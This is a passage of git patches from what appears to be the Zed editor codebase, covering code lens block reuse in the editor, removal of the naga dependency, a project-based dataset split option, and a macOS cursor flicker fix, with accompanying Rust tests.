+ let mut kept_blocks = Vec::new(); + let mut renderers_to_replace = HashMap::default(); + let mut blocks_to_remove = HashSet::default(); + let mut covered_rows = HashSet::default(); + + for old in old_blocks { + let row = MultiBufferRow(old.anchor.to_point(snapshot).row); + if !rows_with_any_lens.contains(&row) { + blocks_to_remove.insert(old.block_id); + continue; + } + covered_rows.insert(row); + let Some(new_line) = new_lines_by_row.remove(&row) else { + kept_blocks.push(old); + continue; + }; + if rendered_text_matches(&old.line, &new_line) { + kept_blocks.push(old); + } else { + let mut updated = old; + updated.line = new_line.clone(); + renderers_to_replace.insert( + updated.block_id, + build_code_lens_renderer(new_line, editor_handle.clone()), + ); + kept_blocks.push(updated); + } + } + + let mut to_insert = Vec::new(); + for (row, new_line) in new_lines_by_row { + if covered_rows.contains(&row) { + continue; + } + let anchor = new_line.position; + let props = BlockProperties { + placement: BlockPlacement::Above(anchor), + height: Some(1), + style: BlockStyle::Flex, + render: build_code_lens_renderer(new_line.clone(), editor_handle.clone()), + priority: 0, + }; + to_insert.push((props, anchor, new_line)); + } + + if !blocks_to_remove.is_empty() { + self.remove_blocks(blocks_to_remove, None, cx); + } + if !renderers_to_replace.is_empty() { + self.replace_blocks(renderers_to_replace, None, cx); + } + if !to_insert.is_empty() { + let mut props = Vec::with_capacity(to_insert.len()); + let mut metadata = Vec::with_capacity(to_insert.len()); + for (p, anchor, line) in to_insert { + props.push(p); + metadata.push((anchor, line)); + } + let block_ids = self.insert_blocks(props, None, cx); + for (block_id, (anchor, line)) in block_ids.into_iter().zip(metadata) { + kept_blocks.push(CodeLensBlock { + block_id, + anchor, + line, + }); + } + } + + let code_lens = self.code_lens.get_or_insert_with(CodeLensState::default); + if actions.is_empty() { + code_lens.actions.remove(&buffer_id); + } else { + code_lens.actions.insert(buffer_id, actions); + } + if kept_blocks.is_empty() { + code_lens.blocks.remove(&buffer_id); + } else { + code_lens.blocks.insert(buffer_id, kept_blocks); + } + cx.notify(); + } + pub fn supports_code_lens(&self, cx: &ui::App) -> bool { let Some(project) = self.project.as_ref() else { return false; @@ -502,7 +458,7 @@ impl Editor { let code_lens = self.code_lens.get_or_insert_with(CodeLensState::default); code_lens.resolve_task = cx.spawn(async move |editor, cx| { - let resolved_code_lens = join_all( + let resolved_per_buffer = join_all( resolve_tasks .into_iter() .map(|(buffer_id, task)| async move { (buffer_id, task.await) }), @@ -510,65 +466,42 @@ impl Editor { .await; editor .update(cx, |editor, cx| { - editor.insert_resolved_code_lens_blocks(resolved_code_lens, cx); - }) - .ok(); - }); - } - - fn insert_resolved_code_lens_blocks( - &mut self, - resolved_code_lens: Vec<(BufferId, Vec)>, - cx: &mut Context, - ) { - let multi_buffer_snapshot = self.buffer().read(cx).snapshot(cx); - let editor_handle = cx.entity().downgrade(); - - for (buffer_id, actions) in resolved_code_lens { - let lenses = actions - .into_iter() - .filter_map(|action| { - let title = match &action.lsp_action { - project::LspAction::CodeLens(lens) => lens - .command + let snapshot = editor.buffer().read(cx).snapshot(cx); + for (buffer_id, newly_resolved) in resolved_per_buffer { + if newly_resolved.is_empty() { + continue; + } + let Some(mut actions) = editor + .code_lens .as_ref() - .map(|cmd| SharedString::from(&cmd.title)), - _ => None, - }?; - let position = multi_buffer_snapshot.anchor_in_excerpt(action.range.start)?; - Some((position, CodeLensItem { title, action })) - }) - .collect(); - - let blocks = group_lenses_by_row(lenses, &multi_buffer_snapshot) - .map(|lens_line| { - let position = lens_line.position; - BlockProperties { - placement: BlockPlacement::Above(position), - height: Some(1), - style: BlockStyle::Flex, - render: Arc::new(render_code_lens_line(lens_line, editor_handle.clone())), - priority: 0, + .and_then(|state| state.actions.get(&buffer_id)) + .cloned() + else { + continue; + }; + for resolved in newly_resolved { + if let Some(unresolved) = actions.iter_mut().find(|action| { + action.server_id == resolved.server_id + && action.range == resolved.range + }) { + *unresolved = resolved; + } + } + editor.apply_lens_actions_for_buffer(buffer_id, actions, &snapshot, cx); } }) - .collect::>(); - - if !blocks.is_empty() { - let block_ids = self.insert_blocks(blocks, None, cx); - self.code_lens - .get_or_insert_with(CodeLensState::default) - .block_ids - .entry(buffer_id) - .or_default() - .extend(block_ids); - } - } - cx.notify(); + .ok(); + }); } pub(super) fn clear_code_lenses(&mut self, cx: &mut Context) { if let Some(code_lens) = self.code_lens.take() { - let all_blocks = code_lens.all_block_ids(); + let all_blocks = code_lens + .blocks + .into_values() + .flatten() + .map(|block| block.block_id) + .collect::>(); if !all_blocks.is_empty() { self.remove_blocks(all_blocks, None, cx); } @@ -578,6 +511,138 @@ impl Editor { } } +/// Whether two lens lines would render the same on screen — same indent +/// and same titles in the same order. Used to skip recreating a renderer +/// (and thus a click handler) when nothing about the displayed line +/// changed; the captured [`CodeAction`] inside the existing renderer keeps +/// pointing at the right spot because its anchors track buffer edits. +fn rendered_text_matches(a: &CodeLensLine, b: &CodeLensLine) -> bool { + a.indent_column == b.indent_column + && a.items.len() == b.items.len() + && a.items + .iter() + .zip(&b.items) + .all(|(x, y)| x.title == y.title) +} + +fn group_lenses_by_row( + lenses: Vec<(Anchor, CodeLensItem)>, + snapshot: &MultiBufferSnapshot, +) -> impl Iterator { + lenses + .into_iter() + .into_group_map_by(|(position, _)| { + let row = position.to_point(snapshot).row; + MultiBufferRow(row) + }) + .into_iter() + .sorted_by_key(|(row, _)| *row) + .filter_map(|(row, entries)| { + let position = entries.first()?.0; + let items = entries.into_iter().map(|(_, item)| item).collect(); + let indent_column = snapshot.indent_size_for_line(row).len; + Some(CodeLensLine { + position, + indent_column, + items, + }) + }) +} + +fn build_code_lens_renderer(line: CodeLensLine, editor: WeakEntity) -> RenderBlock { + Arc::new(move |cx| { + let mut children = Vec::with_capacity((2 * line.items.len()).saturating_sub(1)); + let text_style = &cx.editor_style.text; + let font = text_style.font(); + let font_size = text_style.font_size.to_pixels(cx.window.rem_size()) * 0.9; + + for (i, item) in line.items.iter().enumerate() { + if i > 0 { + children.push( + div() + .font(font.clone()) + .text_size(font_size) + .text_color(cx.app.theme().colors().text_muted) + .child(" | ") + .into_any_element(), + ); + } + + let title = item.title.clone(); + let action = item.action.clone(); + let position = line.position; + let editor_handle = editor.clone(); + + children.push( + div() + .id(ElementId::from(i)) + .font(font.clone()) + .text_size(font_size) + .text_color(cx.app.theme().colors().text_muted) + .cursor_pointer() + .hover(|style| style.text_color(cx.app.theme().colors().text)) + .child(title) + .on_mouse_down(MouseButton::Left, |_, _, cx| { + cx.stop_propagation(); + }) + .on_mouse_down(MouseButton::Right, |_, _, cx| { + cx.stop_propagation(); + }) + .on_click({ + move |_event, window, cx| { + if let Some(editor) = editor_handle.upgrade() { + editor.update(cx, |editor, cx| { + editor.change_selections( + SelectionEffects::default(), + window, + cx, + |s| { + s.select_anchor_ranges([position..position]); + }, + ); + + let action = action.clone(); + if let Some(workspace) = editor.workspace() { + if try_handle_client_command( + &action, editor, &workspace, window, cx, + ) { + return; + } + + let project = workspace.read(cx).project().clone(); + if let Some(buffer) = editor + .buffer() + .read(cx) + .buffer(action.range.start.buffer_id) + { + project + .update(cx, |project, cx| { + project + .apply_code_action(buffer, action, true, cx) + }) + .detach_and_log_err(cx); + } + } + }); + } + } + }) + .into_any_element(), + ); + } + + div() + .id(cx.block_id) + .pl(cx.margins.gutter.full_width() + cx.em_width * (line.indent_column as f32 + 0.5)) + .h_full() + .flex() + .flex_row() + .items_end() + .children(children) + .into_any_element() + }) +} + #[cfg(test)] mod tests { use std::{ @@ -592,7 +657,7 @@ mod tests { use util::path; use crate::{ - Editor, + Editor, LSP_REQUEST_DEBOUNCE_TIMEOUT, editor_tests::{init_test, update_test_editor_settings}, test::editor_lsp_test_context::EditorLspTestContext, }; @@ -660,12 +725,209 @@ mod tests { let total_blocks: usize = editor .code_lens .as_ref() - .map(|s| s.block_ids.values().map(|v| v.len()).sum()) + .map(|s| s.blocks.values().map(|v| v.len()).sum()) .unwrap_or(0); assert_eq!(total_blocks, 2, "Should have inserted two code lens blocks"); }); } + #[gpui::test] + async fn test_code_lens_blocks_kept_across_refresh(cx: &mut TestAppContext) { + init_test(cx, |_| {}); + update_test_editor_settings(cx, &|settings| { + settings.code_lens = Some(CodeLens::On); + }); + + let mut cx = EditorLspTestContext::new_typescript( + lsp::ServerCapabilities { + code_lens_provider: Some(lsp::CodeLensOptions { + resolve_provider: None, + }), + execute_command_provider: Some(lsp::ExecuteCommandOptions { + commands: vec!["lens_cmd".to_string()], + ..lsp::ExecuteCommandOptions::default() + }), + ..lsp::ServerCapabilities::default() + }, + cx, + ) + .await; + + let mut code_lens_request = + cx.set_request_handler::(move |_, _, _| async { + Ok(Some(vec![lsp::CodeLens { + range: lsp::Range::new(lsp::Position::new(0, 0), lsp::Position::new(0, 19)), + command: Some(lsp::Command { + title: "1 reference".to_owned(), + command: "lens_cmd".to_owned(), + arguments: None, + }), + data: None, + }])) + }); + + cx.set_state("ˇfunction hello() {}\nfunction world() {}"); + + assert!( + code_lens_request.next().await.is_some(), + "should have received the initial code lens request" + ); + cx.run_until_parked(); + + let initial_block_ids = cx.editor.read_with(&cx.cx.cx, |editor, _| { + editor + .code_lens + .as_ref() + .map(|s| { + s.blocks + .values() + .flatten() + .map(|b| b.block_id) + .collect::>() + }) + .unwrap_or_default() + }); + assert_eq!( + initial_block_ids.len(), + 1, + "Should have one initial code lens block" + ); + + cx.update_editor(|editor, window, cx| { + editor.move_to_end(&crate::actions::MoveToEnd, window, cx); + editor.handle_input("\n// trailing comment", window, cx); + }); + cx.executor() + .advance_clock(LSP_REQUEST_DEBOUNCE_TIMEOUT + Duration::from_millis(50)); + assert!( + code_lens_request.next().await.is_some(), + "should have received another code lens request after edit" + ); + cx.run_until_parked(); + + let refreshed_block_ids = cx.editor.read_with(&cx.cx.cx, |editor, _| { + editor + .code_lens + .as_ref() + .map(|s| { + s.blocks + .values() + .flatten() + .map(|b| b.block_id) + .collect::>() + }) + .unwrap_or_default() + }); + assert_eq!( + refreshed_block_ids, initial_block_ids, + "Code lens blocks should be preserved across refreshes when their content is unchanged" + ); + } + + #[gpui::test] + async fn test_code_lens_blocks_kept_when_only_resolve_fills_titles(cx: &mut TestAppContext) { + init_test(cx, |_| {}); + update_test_editor_settings(cx, &|settings| { + settings.code_lens = Some(CodeLens::On); + }); + + let mut cx = EditorLspTestContext::new_typescript( + lsp::ServerCapabilities { + code_lens_provider: Some(lsp::CodeLensOptions { + resolve_provider: Some(true), + }), + ..lsp::ServerCapabilities::default() + }, + cx, + ) + .await; + + // The LSP returns shallow code lenses on every fetch; only `resolve` + // populates the command/title. This is the realistic flow with + // servers like rust-analyzer and exercises the path where each + // post-edit refresh comes back unresolved before the resolve catches + // up. + let mut code_lens_request = + cx.set_request_handler::(move |_, _, _| async { + Ok(Some(vec![lsp::CodeLens { + range: lsp::Range::new(lsp::Position::new(0, 0), lsp::Position::new(0, 19)), + command: None, + data: Some(serde_json::json!({"id": "lens_1"})), + }])) + }); + + cx.lsp + .set_request_handler::(|lens, _| async move { + Ok(lsp::CodeLens { + command: Some(lsp::Command { + title: "1 reference".to_owned(), + command: "resolved_cmd".to_owned(), + arguments: None, + }), + ..lens + }) + }); + + cx.set_state("ˇfunction hello() {}\nfunction world() {}"); + + assert!( + code_lens_request.next().await.is_some(), + "should have received the initial code lens request" + ); + cx.run_until_parked(); + + let initial = cx.editor.read_with(&cx.cx.cx, |editor, _| { + editor + .code_lens + .as_ref() + .map(|s| { + s.blocks + .values() + .flatten() + .map(|b| b.block_id) + .collect::>() + }) + .unwrap_or_default() + }); + assert_eq!( + initial.len(), + 1, + "resolve should have inserted exactly one block from the shallow lens" + ); + + for keystroke in [" ", "x", "y"] { + cx.update_editor(|editor, window, cx| { + editor.move_to_end(&crate::actions::MoveToEnd, window, cx); + editor.handle_input(keystroke, window, cx); + }); + cx.executor() + .advance_clock(LSP_REQUEST_DEBOUNCE_TIMEOUT + Duration::from_millis(50)); + assert!( + code_lens_request.next().await.is_some(), + "should have received another (shallow) code lens request after edit" + ); + cx.run_until_parked(); + + let after = cx.editor.read_with(&cx.cx.cx, |editor, _| { + editor + .code_lens + .as_ref() + .map(|s| { + s.blocks + .values() + .flatten() + .map(|b| b.block_id) + .collect::>() + }) + .unwrap_or_default() + }); + assert_eq!( + after, initial, + "Block IDs must survive the unresolved-fetch → resolve cycle without churn" + ); + } + } + #[gpui::test] async fn test_code_lens_disabled_by_default(cx: &mut TestAppContext) { init_test(cx, |_| {}); @@ -754,7 +1016,7 @@ mod tests { let total_blocks: usize = editor .code_lens .as_ref() - .map(|s| s.block_ids.values().map(|v| v.len()).sum()) + .map(|s| s.blocks.values().map(|v| v.len()).sum()) .unwrap_or(0); assert_eq!(total_blocks, 1, "Should have one code lens block"); }); @@ -841,7 +1103,7 @@ mod tests { let total_blocks: usize = editor .code_lens .as_ref() - .map(|s| s.block_ids.values().map(|v| v.len()).sum()) + .map(|s| s.blocks.values().map(|v| v.len()).sum()) .unwrap_or(0); assert_eq!( total_blocks, 2, From 47e25758cfce41ce8b7b14aa2d5cf6aa41dacba6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Miguel=20Raz=20Guzm=C3=A1n=20Macedo?= Date: Tue, 28 Apr 2026 12:00:07 +0200 Subject: [PATCH 073/231] gpui: Remove naga dependency (#55070) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes https://github.com/zed-industries/zed/issues/54981#issuecomment-4333425722 Release Notes: - N/A or Added/Fixed/Improved ... --- Cargo.lock | 34 ++++------------------------------ Cargo.toml | 1 - crates/gpui/Cargo.toml | 1 - 3 files changed, 4 insertions(+), 32 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 2457f314e32ab6..5163528b0550f3 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -7675,7 +7675,6 @@ dependencies = [ "mach2 0.5.0", "media", "metal", - "naga 29.0.0 (registry+https://github.com/rust-lang/crates.io-index)", "num_cpus", "objc", "objc2", @@ -10941,31 +10940,6 @@ version = "0.8.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "e5ce46fe64a9d73be07dcbe690a38ce1b293be448fd8ce1e6c1b8062c9f72c6a" -[[package]] -name = "naga" -version = "29.0.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "85b4372fed0bd362d646d01b6926df0e837859ccc522fed720c395e0460f29c8" -dependencies = [ - "arrayvec", - "bit-set 0.9.1", - "bitflags 2.10.0", - "cfg-if", - "cfg_aliases 0.2.1", - "codespan-reporting", - "half", - "hashbrown 0.16.1", - "hexf-parse", - "indexmap 2.11.4", - "libm", - "log", - "num-traits", - "once_cell", - "rustc-hash 1.1.0", - "thiserror 2.0.17", - "unicode-ident", -] - [[package]] name = "naga" version = "29.0.0" @@ -20519,7 +20493,7 @@ dependencies = [ "hashbrown 0.16.1", "js-sys", "log", - "naga 29.0.0 (git+https://github.com/zed-industries/wgpu.git?branch=v29)", + "naga", "parking_lot", "portable-atomic", "profiling", @@ -20549,7 +20523,7 @@ dependencies = [ "hashbrown 0.16.1", "indexmap 2.11.4", "log", - "naga 29.0.0 (git+https://github.com/zed-industries/wgpu.git?branch=v29)", + "naga", "once_cell", "parking_lot", "portable-atomic", @@ -20614,7 +20588,7 @@ dependencies = [ "libc", "libloading", "log", - "naga 29.0.0 (git+https://github.com/zed-industries/wgpu.git?branch=v29)", + "naga", "ndk-sys", "objc2", "objc2-core-foundation", @@ -20647,7 +20621,7 @@ name = "wgpu-naga-bridge" version = "29.0.0" source = "git+https://github.com/zed-industries/wgpu.git?branch=v29#a466bc382ea747f8e1ac810efdb6dcd49a514575" dependencies = [ - "naga 29.0.0 (git+https://github.com/zed-industries/wgpu.git?branch=v29)", + "naga", "wgpu-types", ] diff --git a/Cargo.toml b/Cargo.toml index 69d2a5c2f59ecc..bf87ff22e5bc04 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -622,7 +622,6 @@ markup5ever_rcdom = "0.3.0" metal = "0.33" minidumper = "0.9" moka = { version = "0.12.10", features = ["sync"] } -naga = { version = "29.0", features = ["wgsl-in"] } nanoid = "0.4" nbformat = "1.2.0" nix = "0.29" diff --git a/crates/gpui/Cargo.toml b/crates/gpui/Cargo.toml index 38a8c6134d1aa4..d7e69c7b19cac9 100644 --- a/crates/gpui/Cargo.toml +++ b/crates/gpui/Cargo.toml @@ -171,7 +171,6 @@ embed-resource = { version = "3.0", optional = true } [target.'cfg(target_os = "macos")'.build-dependencies] bindgen = "0.71" cbindgen = { version = "0.28.0", default-features = false } -naga.workspace = true From 90f49d8e54738024cb53ee4b75a6aa10ccce1f9e Mon Sep 17 00:00:00 2001 From: Oleksiy Syvokon Date: Tue, 28 Apr 2026 15:33:48 +0300 Subject: [PATCH 074/231] ep: Add option to split datasets by project (#55071) `ep split --stratify=project` will use the first component of `cursor_path`, which is a worktree name. This is an alternative to `--stratify=repo` in absence of `repository_url` Release Notes: - N/A --- .../edit_prediction_cli/src/split_dataset.rs | 93 +++++++++++++++++-- 1 file changed, 84 insertions(+), 9 deletions(-) diff --git a/crates/edit_prediction_cli/src/split_dataset.rs b/crates/edit_prediction_cli/src/split_dataset.rs index f1e0a672695cb9..d1cf602f1f47ce 100644 --- a/crates/edit_prediction_cli/src/split_dataset.rs +++ b/crates/edit_prediction_cli/src/split_dataset.rs @@ -22,6 +22,7 @@ //! The `--stratify` flag controls how examples are grouped before splitting: //! //! - `cursor-path` (default): group by the `cursor_path` JSON field +//! - `project`: group by the first component of the `cursor_path` JSON field //! - `repo`: group by the `repository_url` JSON field //! - `none`: no grouping, split individual examples //! @@ -35,7 +36,7 @@ use clap::Args; use rand::SeedableRng; use rand::seq::SliceRandom; use serde_json::Value; -use std::collections::HashMap; +use std::collections::BTreeMap; use std::fs::File; use std::io::{self, BufRead, BufReader, BufWriter, Write}; use std::path::{Path, PathBuf}; @@ -74,6 +75,7 @@ EXAMPLES: STRATIFICATION: Controls how examples are grouped before splitting: cursor-path Group by "cursor_path" field (default) + project Group by the first component of the "cursor_path" field repo Group by "repository_url" field none No grouping, split individual examples @@ -96,6 +98,8 @@ pub struct SplitArgs { pub enum Stratify { #[strum(serialize = "cursor_path")] CursorPath, + #[strum(serialize = "project")] + Project, #[strum(serialize = "repo")] Repo, #[strum(serialize = "none")] @@ -324,19 +328,31 @@ fn group_lines(lines: &[String], stratify: Stratify) -> Vec> { return lines.iter().map(|line| vec![line.clone()]).collect(); } - let field = match stratify { - Stratify::Repo => "repository_url", - Stratify::CursorPath => "cursor_path", - Stratify::None => unreachable!(), + let get_key = |line: &str| { + let json: Value = serde_json::from_str(line).unwrap_or_default(); + match stratify { + Stratify::Repo => json + .get("repository_url") + .and_then(|v| v.as_str()) + .map(|s| s.to_string()), + Stratify::CursorPath => json + .get("cursor_path") + .and_then(|v| v.as_str()) + .map(|s| s.to_string()), + Stratify::Project => json + .get("cursor_path") + .and_then(|v| v.as_str()) + .and_then(|s| s.split(['/', '\\']).next()) + .map(|s| s.to_string()), + Stratify::None => unreachable!(), + } }; - let mut groups: HashMap> = HashMap::new(); + let mut groups: BTreeMap> = BTreeMap::new(); let mut ungrouped: Vec> = Vec::new(); for line in lines { - let key = serde_json::from_str::(line) - .ok() - .and_then(|v| v.get(field)?.as_str().map(|s| s.to_string())); + let key = get_key(line); match key { Some(key) => groups.entry(key).or_default().push(line.clone()), None => ungrouped.push(vec![line.clone()]), @@ -601,4 +617,63 @@ mod tests { assert_eq!(train_lines.len(), 6); assert_eq!(valid_lines.len(), 9); } + + #[test] + fn test_stratify_by_project() { + // 5 repos × 3 lines each = 15 total lines. + // `train=6` should target ~6 lines (2 groups), NOT 6 groups (all 15 lines). + let input = create_temp_jsonl(&[ + r#"{"cursor_path": "project1/some/file.rs", "id": 1}"#, + r#"{"cursor_path": "project2/some/file.rs", "id": 2}"#, + r#"{"cursor_path": "project3/some/file.rs", "id": 3}"#, + r#"{"cursor_path": "project1/other/file.rs", "id": 4}"#, + r#"{"cursor_path": "project2/other/file.rs", "id": 5}"#, + r#"{"cursor_path": "project3/other/file.rs", "id": 6}"#, + r#"{"cursor_path": "project3/another/file.rs", "id": 7}"#, + r#"{"cursor_path": "project3/even/more.rs", "id": 8}"#, + ]); + + let temp_dir = tempfile::tempdir().unwrap(); + let train_path = temp_dir.path().join("train.jsonl"); + let valid_path = temp_dir.path().join("valid.jsonl"); + + let args = SplitArgs { + seed: Some(1), + stratify: Stratify::Project, + }; + let inputs = vec![ + input.path().to_path_buf(), + PathBuf::from(format!("{}=4", train_path.display())), + PathBuf::from(format!("{}=rest", valid_path.display())), + ]; + + run_split(&args, &inputs).unwrap(); + + let train_content = std::fs::read_to_string(&train_path).unwrap(); + let valid_content = std::fs::read_to_string(&valid_path).unwrap(); + + // Make sure project 1 and project 2 are in the train set, and project 3 is in the valid set. + let mut train_ids: Vec = train_content + .lines() + .map(|l| { + serde_json::from_str::(l).unwrap()["id"] + .as_u64() + .unwrap() + }) + .collect(); + let mut valid_ids: Vec = valid_content + .lines() + .map(|l| { + serde_json::from_str::(l).unwrap()["id"] + .as_u64() + .unwrap() + }) + .collect(); + + train_ids.sort(); + valid_ids.sort(); + + assert_eq!(train_ids, vec![1, 2, 4, 5]); + assert_eq!(valid_ids, vec![3, 6, 7, 8]); + } } From 814f1fc06ad9897841b487a021c6766484be8cac Mon Sep 17 00:00:00 2001 From: Agus Zubiaga Date: Tue, 28 Apr 2026 15:12:13 +0200 Subject: [PATCH 075/231] Fix macOS mouse cursor flicker (#55068) #48029 introduced `set_document_path` which is frequently (we are also working on a PR to make it less frequent) called as tabs and panes update. Apparently, the AppKit function it uses (`NSWindow::setRepresentedFilename`) can cause the current cursor style to be reset, producing flicker as the cursor would change to `Arrow` temporarily until the right cursor style is set again in the next frame. This PR reworks how we set the cursor to use AppKit's `resetCursorRects`, giving us a chance to re-set the cursor when the OS decides to invalidate it. Finally, it fixes a separate bug introduced in #50827 where moving the mouse while typing in an editor would cause to the cursor to flicker between `None` (hidden) -> `Arrow` -> `IBeam`. This was caused by incorrectly resetting the cursor to `Arrow` when the last input came from the keyboard. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - N/A --------- Co-authored-by: Bennet Bo Fenner --- crates/gpui/src/window.rs | 24 +++++- crates/gpui_macos/src/platform.rs | 48 +----------- crates/gpui_macos/src/window.rs | 120 ++++++++++++++++++++++++++++-- 3 files changed, 138 insertions(+), 54 deletions(-) diff --git a/crates/gpui/src/window.rs b/crates/gpui/src/window.rs index 4606ee8a5b8874..4cea82bde7aefb 100644 --- a/crates/gpui/src/window.rs +++ b/crates/gpui/src/window.rs @@ -601,6 +601,22 @@ impl HitboxId { if window.last_input_was_keyboard() { return false; } + self.hit_test(window) + } + + /// Checks if the hitbox with this ID is currently hovered, regardless of the last + /// input modality used. + /// + /// See [`HitboxId::is_hovered`] for more details. + pub(crate) fn is_hovered_ignoring_last_input(self, window: &Window) -> bool { + // If this hitbox has captured the pointer, it's always considered hovered + if window.captured_hitbox == Some(self) { + return true; + } + self.hit_test(window) + } + + fn hit_test(self, window: &Window) -> bool { let hit_test = &window.mouse_hit_test; for id in hit_test.ids.iter().take(hit_test.hover_hitbox_count) { if self == *id { @@ -877,9 +893,11 @@ impl Frame { .rev() .fold_while(None, |style, request| match request.hitbox_id { None => Done(Some(request.style)), - Some(hitbox_id) => Continue( - style.or_else(|| hitbox_id.is_hovered(window).then_some(request.style)), - ), + Some(hitbox_id) => Continue(style.or_else(|| { + hitbox_id + .is_hovered_ignoring_last_input(window) + .then_some(request.style) + })), }) .into_inner() } diff --git a/crates/gpui_macos/src/platform.rs b/crates/gpui_macos/src/platform.rs index 9444be19d7ef81..fa37597065fb17 100644 --- a/crates/gpui_macos/src/platform.rs +++ b/crates/gpui_macos/src/platform.rs @@ -1,6 +1,7 @@ use crate::{ BoolExt, MacDispatcher, MacDisplay, MacKeyboardLayout, MacKeyboardMapper, MacWindow, events::key_to_native, ns_string, pasteboard::Pasteboard, renderer, + set_active_window_cursor_style, }; use anyhow::{Context as _, anyhow}; use block::ConcreteBlock; @@ -979,52 +980,7 @@ impl Platform for MacPlatform { /// in macOS's [NSCursor](https://developer.apple.com/documentation/appkit/nscursor). fn set_cursor_style(&self, style: CursorStyle) { unsafe { - if style == CursorStyle::None { - let _: () = msg_send![class!(NSCursor), setHiddenUntilMouseMoves:YES]; - return; - } - - let new_cursor: id = match style { - CursorStyle::Arrow => msg_send![class!(NSCursor), arrowCursor], - CursorStyle::IBeam => msg_send![class!(NSCursor), IBeamCursor], - CursorStyle::Crosshair => msg_send![class!(NSCursor), crosshairCursor], - CursorStyle::ClosedHand => msg_send![class!(NSCursor), closedHandCursor], - CursorStyle::OpenHand => msg_send![class!(NSCursor), openHandCursor], - CursorStyle::PointingHand => msg_send![class!(NSCursor), pointingHandCursor], - CursorStyle::ResizeLeftRight => msg_send![class!(NSCursor), resizeLeftRightCursor], - CursorStyle::ResizeUpDown => msg_send![class!(NSCursor), resizeUpDownCursor], - CursorStyle::ResizeLeft => msg_send![class!(NSCursor), resizeLeftCursor], - CursorStyle::ResizeRight => msg_send![class!(NSCursor), resizeRightCursor], - CursorStyle::ResizeColumn => msg_send![class!(NSCursor), resizeLeftRightCursor], - CursorStyle::ResizeRow => msg_send![class!(NSCursor), resizeUpDownCursor], - CursorStyle::ResizeUp => msg_send![class!(NSCursor), resizeUpCursor], - CursorStyle::ResizeDown => msg_send![class!(NSCursor), resizeDownCursor], - - // Undocumented, private class methods: - // https://stackoverflow.com/questions/27242353/cocoa-predefined-resize-mouse-cursor - CursorStyle::ResizeUpLeftDownRight => { - msg_send![class!(NSCursor), _windowResizeNorthWestSouthEastCursor] - } - CursorStyle::ResizeUpRightDownLeft => { - msg_send![class!(NSCursor), _windowResizeNorthEastSouthWestCursor] - } - - CursorStyle::IBeamCursorForVerticalLayout => { - msg_send![class!(NSCursor), IBeamCursorForVerticalLayout] - } - CursorStyle::OperationNotAllowed => { - msg_send![class!(NSCursor), operationNotAllowedCursor] - } - CursorStyle::DragLink => msg_send![class!(NSCursor), dragLinkCursor], - CursorStyle::DragCopy => msg_send![class!(NSCursor), dragCopyCursor], - CursorStyle::ContextualMenu => msg_send![class!(NSCursor), contextualMenuCursor], - CursorStyle::None => unreachable!(), - }; - - let old_cursor: id = msg_send![class!(NSCursor), currentCursor]; - if new_cursor != old_cursor { - let _: () = msg_send![new_cursor, set]; - } + set_active_window_cursor_style(style); } } diff --git a/crates/gpui_macos/src/window.rs b/crates/gpui_macos/src/window.rs index d6e1d296ac7cc4..b8dafbbc90bdc5 100644 --- a/crates/gpui_macos/src/window.rs +++ b/crates/gpui_macos/src/window.rs @@ -25,11 +25,11 @@ use cocoa::{ }; use dispatch2::DispatchQueue; use gpui::{ - AnyWindowHandle, BackgroundExecutor, Bounds, Capslock, ExternalPaths, FileDropEvent, - ForegroundExecutor, KeyDownEvent, Keystroke, Modifiers, ModifiersChangedEvent, MouseButton, - MouseDownEvent, MouseMoveEvent, MouseUpEvent, Pixels, PlatformAtlas, PlatformDisplay, - PlatformInput, PlatformInputHandler, PlatformWindow, Point, PromptButton, PromptLevel, - RequestFrameOptions, SharedString, Size, SystemWindowTab, WindowAppearance, + AnyWindowHandle, BackgroundExecutor, Bounds, Capslock, CursorStyle, ExternalPaths, + FileDropEvent, ForegroundExecutor, KeyDownEvent, Keystroke, Modifiers, ModifiersChangedEvent, + MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent, Pixels, PlatformAtlas, + PlatformDisplay, PlatformInput, PlatformInputHandler, PlatformWindow, Point, PromptButton, + PromptLevel, RequestFrameOptions, SharedString, Size, SystemWindowTab, WindowAppearance, WindowBackgroundAppearance, WindowBounds, WindowControlArea, WindowKind, WindowParams, point, px, size, }; @@ -173,6 +173,10 @@ unsafe fn build_classes() { sel!(mouseMoved:), handle_view_event as extern "C" fn(&Object, Sel, id), ); + decl.add_method( + sel!(resetCursorRects), + reset_cursor_rects as extern "C" fn(&Object, Sel), + ); decl.add_method( sel!(pressureChangeWithEvent:), handle_view_event as extern "C" fn(&Object, Sel, id), @@ -313,6 +317,35 @@ pub(crate) fn convert_mouse_position(position: NSPoint, window_height: Pixels) - ) } +/// Stores the cursor style on the active GPUI window and invalidates its cursor rects. +/// +/// # Safety +/// +/// This function is not thread safe. Callers must ensure this is called on the AppKit main +/// thread because it reads the active AppKit window and updates GPUI window state associated +/// with Objective-C objects. +pub(crate) unsafe fn set_active_window_cursor_style(style: CursorStyle) { + // SAFETY: The caller guarantees AppKit main-thread access. The class check ensures the + // window has our WINDOW_STATE_IVAR before reading it. + unsafe { + let app = NSApplication::sharedApplication(nil); + let main_window: id = msg_send![app, mainWindow]; + if main_window.is_null() || !msg_send![main_window, isKindOfClass: WINDOW_CLASS] { + return; + } + + let window_state = get_window_state(&*main_window); + let mut window_state = window_state.lock(); + if window_state.cursor_style != style { + window_state.cursor_style = style; + let _: () = msg_send![ + window_state.native_window, + invalidateCursorRectsForView: window_state.native_view.as_ptr() + ]; + } + } +} + unsafe fn build_window_class(name: &'static str, superclass: &Class) -> *const Class { unsafe { let mut decl = ClassDecl::new(name, superclass).unwrap(); @@ -429,6 +462,8 @@ struct MacWindowState { native_view: NonNull, 